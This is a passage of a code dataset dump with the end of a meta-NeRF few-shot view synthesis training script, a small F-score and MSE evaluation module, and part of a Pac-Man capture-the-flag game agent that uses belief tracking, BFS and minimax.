get_rays_shapenet(hwf, poses)\n\n view_psnrs = []\n view_lpips_alex = []\n view_lpips_vgg = []\n view_ssims = []\n for img, rays_o, rays_d in zip(imgs, ray_origins, ray_directions):\n rays_o, rays_d = rays_o.reshape(-1, 3), rays_d.reshape(-1, 3)\n t_vals, xyz = sample_points(rays_o, rays_d, bound[0], bound[1],\n num_samples, perturb=False)\n\n synth = []\n num_rays = rays_d.shape[0]\n with torch.no_grad():\n for i in range(0, num_rays, raybatch_size):\n rgbs_batch, sigmas_batch = model(xyz[i:i+raybatch_size])\n color_batch = volume_render(rgbs_batch, sigmas_batch,\n t_vals[i:i+raybatch_size],\n white_bkgd=True)\n synth.append(color_batch)\n synth = torch.cat(synth, dim=0).reshape_as(img)\n error = F.mse_loss(img, synth)\n psnr = -10*torch.log10(error)\n view_psnrs.append(psnr)\n\n # additional metrics (lpips alexnet, lpips vgg, ssim)\n img_lpips = torch.unsqueeze(img.permute(2, 0, 1) * 2 - 1, 0)\n synth_lpips = torch.unsqueeze(synth.permute(2, 0, 1) * 2 - 1, 0)\n view_lpips_alex.append(lpips_alex(img_lpips, synth_lpips))\n view_lpips_vgg.append(lpips_vgg(img_lpips, synth_lpips))\n view_ssims.append(pytorch_ssim.ssim(torch.unsqueeze(img, dim=0),\n torch.unsqueeze(synth, dim=0)))\n\n scene_psnr = torch.stack(view_psnrs).mean()\n scene_lpips_alex = torch.stack(view_lpips_alex).mean()\n scene_lpips_vgg = torch.stack(view_lpips_vgg).mean()\n scene_ssim = torch.stack(view_ssims).mean()\n return scene_psnr, scene_lpips_alex, scene_lpips_vgg, scene_ssim\n\n\ndef val_meta(args, epoch_idx, nerf_model, gen_model, val_loader, device):\n \"\"\"\n validate the meta trained model for few-shot view synthesis\n \"\"\"\n gen_model.eval()\n gen_model.requires_grad_(False)\n meta_trained_state = nerf_model.state_dict()\n\n val_step = max((epoch_idx-1)*len(val_loader) +1, 0)\n psnr_accum = dict()\n ssim_accum = dict()\n lpips_alex_accum = dict()\n lpips_vgg_accum = dict()\n\n avg_psnr = 0\n avg_ssim = 0\n avg_lpips_alex = 0\n avg_lpips_vgg = 0\n for idx, batch in enumerate(val_loader):\n imgs = batch[\"imgs\"]\n poses = batch[\"poses\"]\n hwf = batch[\"hwf\"]\n bound = batch[\"bound\"]\n relative_poses = batch[\"relative_poses\"]\n\n imgs, poses, hwf, bound, relative_poses = imgs.to(device), poses.to(device), \\\n hwf.to(device), bound.to(device), relative_poses.to(device)\n imgs, poses, hwf, bound, relative_poses = imgs.squeeze(), \\\n poses.squeeze(), \\\n hwf.squeeze(), \\\n bound.squeeze(), relative_poses.squeeze()\n\n for i in range(args.val_per_scene):\n img_idx = val_views[i]\n tto_imgs, test_imgs = split_at_idx(imgs, idx=img_idx)\n tto_poses, test_poses = split_at_idx(poses, idx=img_idx)\n\n rays_o, rays_d = get_rays_shapenet(hwf, tto_poses)\n rays_o, rays_d = rays_o.reshape(-1, 3), rays_d.reshape(-1, 3)\n num_rays = rays_d.shape[0]\n\n tto_pixels = tto_imgs.reshape(-1, 3)\n # Add weight residual\n val_model = copy.deepcopy(nerf_model)\n val_model.load_state_dict(meta_trained_state)\n val_model = set_grad(val_model, False)\n\n with torch.no_grad():\n weight_res = gen_model(imgs[:25], relative_poses[:25], bound[:25])\n val_model, logs_weight_stat = \\\n add_weight_res(val_model, weight_res, log_round=True,\n setup=\"val/\", std_scale=args.feat.std_scale)\n indices = torch.randint(num_rays, size=[args.nerf.train_batchsize])\n raybatch_o, raybatch_d = rays_o[indices], rays_d[indices]\n pixelbatch = tto_pixels[indices]\n t_vals, xyz = sample_points(raybatch_o, raybatch_d, bound[0], bound[1],\n args.nerf.num_samples, perturb=True)\n rgbs, sigmas = val_model(xyz)\n colors = volume_render(rgbs, sigmas, t_vals, white_bkgd=True)\n val_loss = F.mse_loss(colors, pixelbatch)\n\n\n inner_val_model = copy.deepcopy(val_model)\n for j in range(len(val_model.net)):\n if hasattr(val_model.net[j], \"weight\"):\n layer = val_model.net[j].weight.clone()\n layer.grad = None\n inner_val_model.net[i].weight = nn.Parameter(layer)\n\n inner_val_model = set_grad(inner_val_model, True)\n inner_val_model.train()\n val_optim = torch.optim.SGD(inner_val_model.parameters(), args.nerf.tto_lr)\n\n\n logs,_ = inner_loop(args, inner_val_model, val_optim, tto_pixels, tto_imgs, rays_o,\n rays_d, tto_poses, bound, hwf, args.nerf.num_samples,\n args.nerf.tto_batchsize, args.nerf.tto_steps,\n device=device, idx=idx, log_round=True, setup=\"val/\", input_idx=img_idx)\n\n avg_psnr += logs[\"val/scene_psnr tto_step=\" + str(args.nerf.tto_steps)]\n avg_lpips_alex += logs[\n \"val/LPIPS_alexnet tto_step=\" + str(args.nerf.tto_steps)]\n avg_lpips_vgg += logs[\n \"val/LPIPS_vgg tto_step=\" + str(args.nerf.tto_steps)]\n avg_ssim += logs[\"val/SSIM tto_step=\" + str(args.nerf.tto_steps)]\n\n logs[\"val/tto_views\"] = wandb.Image(make_grid(tto_imgs.permute(0, 3, 1, 2)))\n logs[\"val/test_views\"] = wandb.Image(make_grid(test_imgs.permute(0, 3, 1, 2)))\n logs[\"val/mse_loss\"] = val_loss\n logs = {**logs, **logs_weight_stat, \"val_step\":val_step}\n wandb.log(logs)\n for (key,val) in logs.items():\n if \"psnr\" in key:\n if psnr_accum.get(key) is None:\n psnr_accum[key] = 0\n psnr_accum[key] += val\n if \"LPIPS_vgg\" in key:\n if lpips_vgg_accum.get(key) is None:\n lpips_vgg_accum[key] = 0\n lpips_vgg_accum[key] += val\n\n if \"LPIPS_alexnet\" in key:\n if lpips_alex_accum.get(key) is None:\n lpips_alex_accum[key] = 0\n lpips_alex_accum[key] += val\n\n if \"SSIM\" in key:\n if ssim_accum.get(key) is None:\n ssim_accum[key] = 0\n ssim_accum[key] += val\n val_step+=1\n\n psnr_mean = dict()\n ssim_mean = dict()\n lpips_alex_mean = dict()\n lpips_vgg_mean = dict()\n\n for (key, val) in psnr_accum.items():\n psnr_mean[key + \"_mean\"] = val / len(val_loader)\n for (key, val) in lpips_alex_accum.items():\n lpips_alex_mean[key + \"_mean\"] = val / len(val_loader)\n for (key, val) in lpips_vgg_accum.items():\n lpips_vgg_mean[key + \"_mean\"] = val / len(val_loader)\n for (key, val) in ssim_accum.items():\n ssim_mean[key + \"_mean\"] = val / len(val_loader)\n\n avg_psnr /= len(val_loader)\n avg_lpips_alex /= len(val_loader)\n avg_lpips_vgg /= len(val_loader)\n avg_ssim /= len(val_loader)\n\n wandb.log({**psnr_mean, **lpips_alex_mean, **lpips_vgg_mean,\n **ssim_mean, \"val/PSNR_epoch_mean\": avg_psnr,\n \"epoch_step\":epoch_idx,\n \"val/LPIPS_alexnet_epoch_mean\": avg_lpips_alex,\n \"val/LPIPS_vgg_epoch_mean\": avg_lpips_vgg,\n \"val/SSIM_epoch_mean\": avg_ssim })\n\n\n\n\ndef check_frozen(ckpt, ref_ckpt, layer_res_list=None):\n eps = 0.0000001\n i=0\n for key in ckpt.keys():\n if \".0.\" in key:\n continue\n w = ckpt[key]\n ref_w = ref_ckpt[key]\n diff = w - ref_w\n\n if \"weight\" in key:\n if layer_res_list is not None:\n max_diff = (diff-layer_res_list[i]).abs().max()\n i += 1\n else:\n max_diff = diff.abs().max()\n\n\n if \"bias\" in key:\n max_diff = diff.abs().max()\n\n if max_diff > eps:\n logging.error(key + \" was not the same\\nmax diff: \" + str(max_diff))\n return False\n if layer_res_list is not None and i == len(layer_res_list):\n break\n return True\n\n@hydra.main(config_path=\"conf\", config_name=\"config\")\ndef main(args: DictConfig) -> None:\n # parser = argparse.ArgumentParser(description='shapenet few-shot view synthesis')\n # parser.add_argument('--config', type=str, required=True,\n # help='config file for the shape class (cars, chairs or lamps)')\n # parser.add_argument('--weight_path', type=str,default=None,\n # help='config file for the shape class (cars, chairs '\n # 'or lamps)')\n # parser.add_argument('--debug_overfit_single_scene', default=False,\n # action=\"store_true\")\n # parser.add_argument('--use_reptile_loss', default=False,\n # action=\"store_true\")\n # parser.add_argument(\"--note\", type=str, default=None)\n # parser.add_argument(\"--std_scale\", type=float, default=0.2)\n # args = parser.parse_args()\n\n # with open(args.config) as config:\n # info = json.load(config)\n # for key, value in info.items():\n # args.__dict__[key] = value\n # args.savedir = Path(args.savedir)\n\n global cwd\n cwd = os.getcwd()\n\n wandb.init(name=\"train_\"+args.exp_name, dir=cwd, project=\"meta_NeRF\", entity=\"stereo\",\n save_code=True, job_type=\"train\")\n\n wandb.config.update(args)\n\n # device_idx = (HydraConfig.get().job.num) % torch.cuda.device_count()\n # device = torch.device(\"cuda:\"+str(device_idx))\n device = torch.device(\"cuda\")\n train_set = build_shapenetV2(args, image_set=\"train\", dataset_root=args.data.dataset_root,\n splits_path=args.data.splits_path, num_views=args.nerf.train_views)\n train_loader = DataLoader(train_set, batch_size=1, shuffle=True)\n\n val_set = build_shapenetV2(args, image_set=\"val\", dataset_root=args.data.dataset_root,\n splits_path=args.data.splits_path,\n num_views=args.nerf.tto_views+args.nerf.test_views)\n val_loader = DataLoader(val_set, batch_size=1, shuffle=False)\n\n nerf_model = build_nerf(args.nerf)\n nerf_model.to(device)\n\n out_channel = 0\n for l in nerf_model.net:\n if hasattr(l, \"weight\"):\n c = 1\n for x in l.weight.shape:\n c *= x\n out_channel += c\n\n gen_model = WeightGenerator(args, out_channel=out_channel)\n gen_model.to(device)\n gen_model.feature_extractor.to(device)\n\n gen_optim = torch.optim.Adam(gen_model.gen.parameters(), lr=args.nerf.meta_lr)\n\n global lpips_alex\n global lpips_vgg\n lpips_alex = lpips.LPIPS(net='alex').to(device) # best forward scores\n lpips_vgg = lpips.LPIPS(\n net='vgg').to(device) # closer to \"traditional\" perceptual loss, when used for optimization\n\n global val_views\n\n val_views = make_img_idx(args.nerf.test_views, args.feat.weight_gen_views, args.val_per_scene)\n\n logging.info(\"Training set: \" + str(len(train_loader)) + \" images\" )\n logging.info(\"Val set: \" + str(len(val_loader)) + \" images\")\n logging.info(\"validation views:\\n\" + str(val_views))\n\n if getattr(args.data, \"weight_path\", None) is not None:\n checkpoint = torch.load(args.data.weight_path, map_location=device)\n gen_model.load_state_dict(checkpoint['gen_model_state_dict'])\n gen_optim.load_state_dict(checkpoint['gen_optim_state_dict'])\n\n if args.feat.feature_extractor_type == \"mvsnet\":\n checkpoint = torch.load(args.feat.mvsnet_weight_path, map_location=device)\n gen_model.feature_extractor.load_state_dict(checkpoint[\"network_mvs_state_dict\"])\n\n if getattr(args.data, \"nerf_weight_path\", None) is not None:\n nerf_checkpoint = torch.load(args.data.nerf_weight_path, map_location=device)\n\n if \"nerf_model_state_dict\" in nerf_checkpoint.keys():\n nerf_checkpoint = nerf_checkpoint[\"nerf_model_state_dict\"]\n\n elif \"meta_model_state_dict\" in nerf_checkpoint.keys():\n nerf_checkpoint = nerf_checkpoint[\"meta_model_state_dict\"]\n else:\n logging.error(\"checkpoint doesn't contain meta-nerf initialized weights\")\n raise ValueError()\n nerf_model.load_state_dict(nerf_checkpoint)\n else:\n logging.error(\"must provide path to metaNeRF initial weights\")\n raise ValueError()\n\n wandb.watch(gen_model.gen, log=\"all\", log_freq=100)\n # val_meta(args, 0, nerf_model, gen_model, val_loader, device)\n for epoch in range(1, args.nerf.meta_epochs+1):\n logging.info(\"Epoch \" + str(epoch) + \" training...\")\n train_meta(args, epoch, nerf_model, gen_model, gen_optim, train_loader, device, ref_state_dict=nerf_checkpoint)\n val_meta(args, epoch, nerf_model, gen_model, val_loader, device)\n\n ckpt_name = cwd+\"/\" + args.nerf.exp_name + \"_epoch\" + str(epoch) + \".pth\"\n torch.save({\n 'epoch': epoch,\n 'gen_model_state_dict': gen_model.state_dict(),\n 'gen_optim_state_dict': gen_optim.state_dict(),\n 'nerf_model_state_dict': nerf_model.state_dict()\n }, ckpt_name)\n wandb.save(ckpt_name)\n logging.info(\"Testing...\")\n test(args, nerf_model=nerf_model, gen_model=gen_model)\n logging.info(\"Complete!\")\n\n\nif __name__ == '__main__':\n main()","sub_path":"weight_gen_train.py","file_name":"weight_gen_train.py","file_ext":"py","file_size_in_byte":25014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"151032327","text":"\"\"\"\nContains the fscore and MSE funtions for evaluation\n\"\"\"\n\ndef f_score(guesses): #list of tuples [(actual, guess),(actual,guess)]\n confusion = {} #confusion matrix\n\n unique_classes = []\n for i in guesses:\n if i[0] not in unique_classes:\n unique_classes.append(i[0])\n\n #for each class, initialize the confusion matrix with zeros for that class\n for class_name in unique_classes:\n confusion.update({class_name:{'TP':0,'FP':0,'TN':0,'FN':0}})#class_name is the key for each classes confusion matrix\n #confusion{class:{TP:0,FP:0,TN:0,FN:0}}\n\n #for each class\n for class_name in unique_classes:\n #for each data point guessed in that class\n for result in guesses: #result[0] is actual class and result[1] is our guess\n if class_name == result[1] and class_name == result[0]: #guess is accurate with what the class actually was\n value = 'TP'\n if class_name == result[1] and class_name != result[0]: #guessed that a record was part of a class and it wasn't\n value = 'FP'\n if class_name != result[1] and class_name == result[0]: #guessed that a record was not part of a class and it was\n value = 'FN'\n if class_name != result[1] and class_name != result[0]: #guess is accurate that the record did not belong to a class\n value = 'TN'\n confusion[class_name][value] += 1 #increment that classes TP/FP/TN/FN count accordingly\n\n #calculate our class independent accuracy\n correct = 0\n total = 0\n for result in guesses:\n if(result[0]==result[1]):\n correct+=1\n total+=1\n accuracy = correct/total\n\n\n num_of_classes = len(confusion)\n\n count = 0\n precision = 0\n recall=0\n f1=0\n for class1, matrix in confusion.items():\n TP = matrix['TP']\n TN = matrix['TN']\n FP = matrix['FP']\n FN = matrix['FN']\n if((TP+FP) != 0):\n precision += TP/(TP+FP)\n ptemp = TP/(TP+FP)\n else:\n ptemp = 0\n if((TP+FN) != 0):\n recall += TP/(TP+FN)\n rtemp = TP/(TP+FN)\n else:\n rtemp = 0\n if((ptemp+rtemp)!=0):\n f1 += 2*ptemp*rtemp/(ptemp+rtemp)\n count+=1\n precision = precision/count\n recall = recall/count\n f1 = f1/count\n\n #f1 = 2*precision*recall/(precision+recall)\n\n metrics = {'F1': f1, 'Precision':precision, 'Recall':recall, 'Accuracy': accuracy}\n return metrics\n\ndef mse(guesses):\n error = 0\n for i in guesses:\n error += (i[0] - i[1])**2\n error/=len(guesses)\n return error\n","sub_path":"Assignment_EC/evaluations.py","file_name":"evaluations.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"636652008","text":"# myTeam.py\n# version 2.3 fix bug\n# Time; 10/17/2020 \n# ---------\n# Licensing Information: You are free to use or extend these projects for\n# educational purposes provided that (1) you do not distribute or publish\n# solutions, (2) you retain this notice, and (3) you provide clear\n# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.\n# \n# Attribution Information: The Pacman AI projects were developed at UC Berkeley.\n# The core projects and autograders were primarily created by John DeNero\n# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\n# Student side autograding was added by Brad Miller, Nick Hay, and\n# Pieter Abbeel (pabbeel@cs.berkeley.edu).\n\n\nfrom captureAgents import CaptureAgent\nfrom capture import GameState\nimport distanceCalculator\nimport random, time, util\nfrom game import Directions\nimport game\n\n# global variable\nbelief = {}\n\n#################\n# Team creation #\n#################\n\ndef createTeam(firstIndex, secondIndex, isRed,\n first = 'ClassicPlanAgent', second = 'DefensiveReflexAgent'):\n \"\"\"\n This function should return a list of two agents that will form the\n team, initialized using firstIndex and secondIndex as their agent\n index numbers. isRed is True if the red team is being created, and\n will be False if the blue team is being created.\n\n As a potentially helpful development aid, this function can take\n additional string-valued keyword arguments (\"first\" and \"second\" are\n such arguments in the case of this function), which will come from\n the --redOpts and --blueOpts command-line arguments to capture.py.\n For the nightly contest, however, your team will be created without\n any extra arguments, so you should make sure that the default\n behavior is what you want for the nightly contest.\n \"\"\"\n\n # The following line is an example only; feel free to change it.\n return [eval(first)(firstIndex), eval(second)(secondIndex)]\n\n##########\n# Agents #\n##########\nclass ClassicPlanAgent(CaptureAgent):\n \"\"\"\n A Dummy agent to serve as an example of the necessary agent structure.\n You should look at baselineTeam.py for more details about how to\n create an agent as this is the bare minimum.\n \"\"\"\n def registerInitialState(self, gameState):\n \"\"\"\n This method handles the initial setup of the\n agent to populate useful fields (such as what team\n we're on).\n A distanceCalculator instance caches the maze distances\n between each pair of positions, so your agents can use:\n self.distancer.getDistance(p1, p2)\n IMPORTANT: This method may run for at most 15 seconds.\n \"\"\"\n\n '''\n Make sure you do not delete the following line. If you would like to\n use Manhattan distances instead of maze distances in order to save\n on initialization time, please take a look at\n CaptureAgent.registerInitialState in captureAgents.py.\n '''\n CaptureAgent.registerInitialState(self, gameState)\n\n '''\n Your initialization code goes here, if you need any.\n '''\n self.enemies = self.getOpponents(gameState)\n\n self.start = gameState.getAgentPosition(self.index)\n \n self.totalFoodNum = len(self.getFood(gameState).asList())\n self.minPelletsToCashIn = int(self.totalFoodNum*0.35)\n\n # Game information\n self.isRed = gameState.isOnRedTeam(self.index)\n self.myFriend = gameState.getRedTeamIndices() if gameState.isOnRedTeam(self.index) else gameState.getBlueTeamIndices()\n self.myFriend.remove(self.index)\n self.myFriend = self.myFriend[0]\n\n # Board information\n self.width = gameState.data.layout.width\n self.height = gameState.data.layout.height\n self.midWidth = self.width/2\n self.midHeight = self.height/2\n\n self.midPointLeft = int((self.width / 2.0)-1)\n self.midPointRight = int((self.width / 2.0)+1)\n\n self.midPoint, self.midPointEnemy, self.enemyCells = self.getBoardInfo(gameState)\n\n self.frontierPoints = [(self.midPoint, int(i)) for i in range(self.height) if not gameState.hasWall(self.midPoint, i)]\n self.frontierPointsEnemy = [(self.midPointEnemy, int(i)) for i in range(self.height) if not gameState.hasWall(self.midPointEnemy, i)]\n\n self.legalPositions = [p for p in gameState.getWalls().asList(False) if p[1] >= 1]\n self.myCells = [c for c in self.legalPositions if c not in self.enemyCells]\n \n # A dictionary for the closest distance from any enemy cell to home\n self.distToHome = self.getDistToHome(self.frontierPoints, self.enemyCells)\n # A sequence of action to the closest enemy cell\n self.frontierState, self.actionFrontier = self.toFrontier(gameState, self.frontierPoints, self.start)\n\n self.closestFrontier = self.frontierState.getAgentPosition(self.index)\n if self.closestFrontier in self.frontierPoints[:int(len(self.frontierPoints)/2)]:\n self.favoredY = 0.0\n else:\n self.favoredY = self.height\n\n # minimax initial set up\n # face 1 enemy depth\n self.miniMaxDepth = 4\n # face 2 enemy depth\n self.miniMaxDepth2 = 3\n # Initialisation for hyper-parameters\n self.epsilon = 0.75\n\n # enemies\n self.enemies = self.getOpponents(gameState)\n global belief # inference on ghost position\n self.trackPosition = {} # track historical positions the enemy has been to\n \n self.findDeadEnd(gameState)\n #print(\"===Find dead end poses=== 145\\n\", \"\\n\",self.deadEndPoses)\n #print(gameState.data.layout)\n fakeLay = gameState.data.layout.deepCopy()\n #print(\"FAKE\\n\",fakeLay)\n maxY = self.height - 1\n newlay = \"\"\n for y in range(self.height):\n for x in range(self.width):\n if (x, maxY - y) in self.deadEndPoses:\n newlay +='X'\n else:\n newlay += fakeLay.layoutText[y][x]\n \n\n #layoutChar = fakeLay.layoutText[maxY - y][x]\n #print(layoutChar)\n newlay += '\\n'\n \"\"\"for (x,y) in self.deadEndPoses:\n fakeLay.layoutText[maxY - y][x] = 'x'\"\"\"\n #print(newlay)\n \n self.findDeadEnd(gameState)\n \n #print(\"===Find dead end poses=== 145\\n\", \"\\n\",self.deadEndPoses)\n #print(gameState.data.layout)\n fakeLay = gameState.data.layout.deepCopy()\n #print(\"FAKE\\n\",fakeLay)\n maxY = self.height - 1\n newlay = \"\"\n for y in range(self.height):\n for x in range(self.width):\n if (x, maxY - y) in self.deadEndPoses:\n newlay +='X'\n else:\n newlay += fakeLay.layoutText[y][x]\n \n\n #layoutChar = fakeLay.layoutText[maxY - y][x]\n #print(layoutChar)\n newlay += '\\n'\n \"\"\"for (x,y) in self.deadEndPoses:\n fakeLay.layoutText[maxY - y][x] = 'x'\"\"\"\n #print(newlay)\n for enemy in self.enemies:\n belief[enemy] = util.Counter()\n self.trackPosition[enemy] = []\n # set our initial belief of the enemies\n belief[enemy][gameState.getInitialAgentPosition(enemy)] = 1\n self.trackPosition[enemy] += [gameState.getInitialAgentPosition(enemy)]\n self.enemyProbPos = util.Counter()\n def randomWalk(self, enemy, gameState):\n \"\"\"\n Update our belief inference of enemy position when they CANNOT BE DETECTED.\n Generate a distribution based on random walk assumption of the enemies.\n In each step, all possible transitions are considered.\n \"\"\"\n newBelief = util.Counter()\n global belief\n for pos in belief[enemy]:\n newPos = util.Counter()\n # get possible transition position\n transitPos = [(pos[0], pos[1] + 1), \n (pos[0] - 1, pos[1]), (pos[0], pos[1] ), (pos[0] + 1, pos[1]), # disregard the option of STOP \n (pos[0], pos[1] - 1)]\n\n for tPos in transitPos:\n if tPos in self.legalPositions:\n if (tPos not in self.trackPosition[enemy]): \n\n newPos[tPos] += 2 # more overlap more chances of ending up in this cell\n self.trackPosition[enemy] += [tPos]\n\n else:\n newPos[tPos] += 0.0001 # assume little possibility of going back\n newPos.normalize()\n \n for nPos, prob in newPos.items():\n # Update the probabilities for each of the positions.\n newBelief[nPos] += prob * belief[enemy][pos] # transition probability = Pr(oldPos)*Pr(newPos)\n \n newBelief.normalize()\n belief[enemy] = newBelief \n\n def observedEnemy(self, enemy, gameState):\n \"\"\"\n This function updates our belief based on noisy observation and random walk result\n \"\"\"\n noisyDist = gameState.getAgentDistances()[enemy]\n myPos = gameState.getAgentPosition(self.index)\n defendFoodCurrent = self.getFoodYouAreDefending(gameState).asList()\n \n newBelief = util.Counter()\n\n prevState = self.getPreviousObservation()\n if prevState:\n defendFoodPrev = self.getFoodYouAreDefending(prevState).asList()\n foodEaten = list(set(defendFoodPrev) - set(defendFoodCurrent))\n enemyState = prevState.getAgentState(enemy)\n invader = enemyState.isPacman\n\n global belief\n\n for legalPos in self.legalPositions:\n trueDist = self.getMazeDistance(legalPos, myPos)\n manhattanDist = util.manhattanDistance(myPos, legalPos)\n # given true distance, probability of noisy distance being true\n distProb = gameState.getDistanceProb(trueDist, noisyDist)\n \n # === eliminate unlikely readings ===\n if manhattanDist <= 5:\n newBelief[legalPos] = 0\n \n elif abs(trueDist - noisyDist) > 6:\n newBelief[legalPos] = 0\n\n else:\n newBelief[legalPos] += belief[enemy][legalPos] * distProb\n\n # === adding likely position ===\n if prevState:\n if foodEaten: # if there's eaten food, enemy should be around that position now\n pos = foodEaten[0]\n if invader:\n transitPos = [(pos[0], pos[1] + 1), \n (pos[0] - 1, pos[1]), (pos[0], pos[1] ), (pos[0] + 1, pos[1]), # disregard the option of STOP \n (pos[0], pos[1] - 1)]\n for tPos in transitPos:\n if tPos in self.legalPositions:\n newBelief[tPos] += 1\n self.trackPosition[enemy] += [tPos]\n\n if newBelief.totalCount() != 0:\n newBelief.normalize()\n belief[enemy] = newBelief\n\n \n def getBoardInfo(self, gameState):\n \"\"\"\n This function provides information of the mid point of both sides and the enemy grid\n \"\"\"\n if self.isRed:\n midPoint = int(self.midPointLeft)\n midPointEnemy = int(self.midPointRight)\n enemyCells = []\n for i in range(self.midPointRight-1, self.width):\n for j in range(self.height):\n if not gameState.hasWall(i, j):\n enemyCells.append((i, j))\n \n else:\n midPoint = int(self.midPointRight)\n midPointEnemy = int(self.midPointLeft)\n enemyCells = []\n for i in range(self.midPointLeft):\n for j in range(self.height):\n if not gameState.hasWall(i, j):\n enemyCells.append((int(i), int(j)))\n return midPoint, midPointEnemy, enemyCells\n\n def getDistToHome(self, home, possibleLocs):\n distToHome = util.Counter()\n for loc in possibleLocs:\n mindist = 9999\n for h in home:\n curDist = (self.getMazeDistance(h, loc))\n if curDist < mindist:\n mindist = curDist\n distToHome[loc] = (curDist, h)\n return distToHome\n\n def toFrontier(self, gameState, frontierPoints, start):\n \"\"\"\n Returns the closest path to home frontier\n \"\"\"\n minDist = 9999\n for point in frontierPoints:\n currentDist = self.getMazeDistance(point, start)\n if currentDist < minDist:\n minDist = currentDist\n minPosition = point\n actionSeq = self.getBfsPath(gameState, minPosition, start)\n return actionSeq\n\n def getBfsPath(self, gameState, end, start):\n \"\"\"\n Helper function for toFrontier\n Using BFS to search path\n \"\"\"\n explored = [start]\n states = util.Queue()\n stateRecord = (gameState, [])\n states.push(stateRecord)\n cur_pos = start\n while not states.isEmpty():\n state, action = states.pop()\n cur_pos = state.getAgentPosition(self.index)\n\n if cur_pos == end:\n return state, action\n \n legalActions = state.getLegalActions(self.index)\n\n for a in legalActions:\n successor = state.generateSuccessor(self.index, a)\n coor = successor.getAgentPosition(self.index)\n if coor not in explored:\n explored.append(coor)\n states.push((successor, action+[a]))\n \n def chooseAction(self, gameState):\n \"\"\"\n Picks among actions randomly.\n \"\"\"\n actions = gameState.getLegalActions(self.index)\n\n '''\n You should change this in your own agent.\n '''\n # INIT VARIABLES TO USE\n gstPos = self.checkStateSafe(gameState)\n myPos = gameState.getAgentPosition(self.index)\n Pacman = gameState.getAgentState(self.index).isPacman\n myState = gameState.getAgentState(self.index)\n defendFood = self.getFoodYouAreDefending(gameState).asList()\n timeLeft = gameState.data.timeleft/4 # for debug\n global belief\n \n # Update our belief of enemies position\n for enemy in self.enemies:\n enemyPos = gameState.getAgentPosition(enemy)\n if enemyPos:\n newBelief = util.Counter()\n newBelief[enemyPos] = 1\n belief[enemy] = newBelief\n \n else:\n self.randomWalk(enemy, gameState)\n self.observedEnemy(enemy, gameState)\n prevState = self.getPreviousObservation()\n if prevState:\n prevEnemyPos = prevState.getAgentPosition(enemy)\n prevMyPos = prevState.getAgentPosition(self.index)\n \n if prevEnemyPos and (self.getMazeDistance(prevEnemyPos, prevMyPos) == 1) and (prevState.getAgentState(enemy).isPacman):\n newBelief = util.Counter()\n newBelief[gameState.getInitialAgentPosition(enemy)] = 1\n print('enemy pacman busted')\n belief[enemy] = newBelief\n self.trackPosition[enemy] = []\n\n # Get most probable position of enemy\n\n for enemy in self.enemies:\n maxProb = sorted(belief[enemy].values())[-3:] # choose top three probably positions\n probablePosition = [(pos, prob) for pos, prob in belief[enemy].items() if prob in maxProb]\n self.enemyProbPos[enemy] = probablePosition\n #print('\\n=== 310 ===', enemyProbPos)\n\n\n # === ABOUT-TO-LOSE SENARIO ===\n # ACTION SENARIO 7: the enemy eat the Capsule\n scared = gameState.data.agentStates[self.index].scaredTimer\n enemyPacmanPos = self.checkStateSafeAtHome(gameState)\n if scared > 0 and enemyPacmanPos and not Pacman:\n #print('308 scared, the enermy eat the cap', scared, self.index, enemyPacmanPos)\n enermyIndex = [tup[0] for tup in enemyPacmanPos]\n toAct = self.minimax(gameState, self.index, enermyIndex, False)\n #print('=== 1140 ===scared, the enermy eat the cap', toAct,self.index,timeLeft,myPos)\n return toAct \n\n if len(defendFood) <= self.totalFoodNum/5:\n \n values = [self.evaluatePatrol(gameState, a) for a in actions]\n maxValue = max(values)\n bestActions = [a for a, v in zip(actions, values) if v == maxValue]\n toAct = random.choice(bestActions)\n #print('=== 228 ===', self.index, toAct, timeLeft, myPos)\n return toAct\n\n # === NORMAL SENARIO ===\n # ACTION STEP 1: reach frontier first\n if self.actionFrontier:\n toAct = self.actionFrontier.pop(0)\n #('=== 351 ===', self.index, toAct, timeLeft)\n return toAct\n\n # ACTION STEP 2: after reaching frontier\n # === REACHED-AN-IMPASSE SENARIO ===\n isInImpasse = self.reachedImpasse(gameState, myPos)\n if isInImpasse:\n values = [self.evaluateImpasse(gameState, a) for a in actions]\n \n maxValue = max(values)\n bestActions = [a for a, v in zip(actions, values) if v == maxValue]\n bestAction = random.choice(bestActions)\n #print('=== 364 === impasse', self.index, bestAction, timeLeft,myPos)\n #print('\\n=== 364 ===', enemyProbPos)\n\n return bestAction\n \n # === DETECTS GHOST === USE MINIMAX ===\n if gstPos and Pacman:\n enermyIndex = [tup[0] for tup in gstPos]\n #depth = self.miniMaxDepth\n \n toAct = self.minimax(gameState, self.index, enermyIndex) \n #print(\"minimax 316\", self.index, toAct, myPos) \n return toAct\n\n # ACTION SENARIO 6: about to win, after detect ghost\n foodLeft = len(self.getFood(gameState).asList())\n if foodLeft <= 2:\n bestDist = 9999\n for action in actions:\n successor = self.getSuccessor(gameState, action)\n pos2 = successor.getAgentPosition(self.index)\n dist = self.getMazeDistance(self.start,pos2)\n \n if dist < bestDist:\n bestAction = action\n bestDist = dist\n #print('=== 333 ===', self.index, bestAction, timeLeft, myPos)\n return bestAction\n\n # ACTION SENARIO 4: if food more than threshold, need to cash in\n goHome = self.needToCashIn(myPos, myState, self.minPelletsToCashIn, timeLeft)\n notHome = self.distToHome[myPos]\n isCloseToFood = self.isCloseToFood(gameState, actions)\n if goHome and (notHome) and (not isCloseToFood):\n dist, end = self.distToHome[myPos]\n # BFS find shortest path to home\n _, path = self.getBfsPath(gameState, end, myPos)\n toAct = path.pop(0)\n\n # check if threatened by ghost\n threatToHome = self.checkStateSafe(gameState)\n Pacman = gameState.getAgentState(self.index).isPacman\n\n # escape\n if threatToHome and Pacman:\n enermyIndex = [tup[0] for tup in gstPos]\n \n toAct = self.minimax(gameState, self.index, enermyIndex) \n # print('=== 406 === need to cash in and threatened action', toAct) \n return toAct\n #print('=== 408 === need to cash in and no threat action', toAct)\n return toAct\n\n \n \n\n # ACTION SENARIO 5: explore food or capsule\n values = [self.evaluate(gameState, a) for a in actions]\n maxValue = max(values)\n bestActions = [a for a, v in zip(actions, values) if v == maxValue]\n toAct = random.choice(bestActions)\n #print('=== 366 ===', self.index, toAct, timeLeft)\n return toAct\n\n\n # helper function for findDeadEnd, to detect the number of wall (includes filled 